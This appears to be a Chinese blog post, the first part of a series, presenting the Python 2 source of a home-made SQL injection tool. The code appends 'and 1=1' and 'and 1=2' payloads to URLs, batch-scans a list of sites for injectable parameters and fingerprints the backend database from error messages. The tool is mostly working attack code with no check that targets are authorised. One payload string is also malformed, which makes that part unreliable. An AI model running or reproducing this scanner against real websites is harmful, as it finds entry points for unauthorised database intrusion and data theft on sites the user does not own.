Python编写SQL注入工具(1)

    编写原由:自学了一点SQL注入和Python的知识.虽然,早就有了非常好的注入工具Sqlmap,但自己想写一个自动注入的工具玩玩,写的不好之处,还望不吝指正.

第一部分:注入点测试模块(injectTest.py)

#coding=gb2312
import urllib
import os
import string
from re import search

class injectTest():
    def __init__(self,url=''):
        self.url=url             #待检测网址,默认为空
        self.a='%20and%201=1'  #检测语句
        self.b='%20and%201=2'
        self.urls=[]             #存在注入的urls

    #检测单个网址的函数
    def judgeUrl(self):
        page=urllib.urlopen(self.url).read()
        pagea=urllib.urlopen(self.url+self.a).read()
        pageb=urllib.urlopen(self.url+self.b).read()
        if page==pagea and page!=pageb:
            print '网址',self.url,'可能存在注入点!'
            return True
        else:
            print '网址:',self.url,'不存在注入点!'
            return False

    #判断待检测的网址文件是否存在
    def fileExists(self,name):
        path=os.getcwd()
        filepath=path+'\\'
        filepath=filepath+name
        return os.path.exists(filepath)

    #进行批量检测
    def judgeUrls(self,file):
        self.fileExists(file)
        #如果不存在默认检测的网址文件,则由用户自行输入待检测的文件
        while not self.fileExists(file):
            print '待检测网址文件不存在'
            file=str(raw_input('请输入待检测的网址文件:'))
            self.fileExists(file)
        urls=open(file,'r')
        for url in urls.readlines():
            print '正在检测:',url
            page=urllib.urlopen(url).read()
            pagea=urllib.urlopen(url+self.a).read()
            pageb=urllib.urlopen(url+self.b).read()
            if page==pagea and page!=pageb:
                self.urls.append(url)
            else:
                continue
        if len(self.urls):
            print '以下网址可能存在注入点:'
            for u in self.urls:
                print u
        else:
            print '该文件中不存在有注入的网址!'

    #判断有注入的网址的数据库类型
    #如果不存在回显错误,则可能不能判断出数据库的类型
    def whatDatabase(self):
        db=''
        sql=string.join(['%20and20%user>0'],'')
        pagex=urllib.urlopen(self.url+sql).read()
        if search('ODBC Microsoft Access',pagex) or search('Microsoft JET Database',pagex) :
            print '数据库:Access'
            db='Access'
            return db
        elif search('SQL Server',pagex) or search('nvarchar',pagex):
            print '数据库:MSSQL'
            db='MSSQL'
            return  db
        elif search('You have an error in your SQL syntax',pagex) or search('Query failed',pagex) or search('SQL query failed',pagex) or search('mysql_fetch_',pagex) or search('mysql_num_rows',pagex) or search('The used SELECT statements have a different number of columns',pagex):
            print '数据库:MYSQL'
            db='MYSQL'
            return db
        else:
            print '未判断出数据库类型!'
            return db

你可能感兴趣的:(Python编写SQL注入工具(1))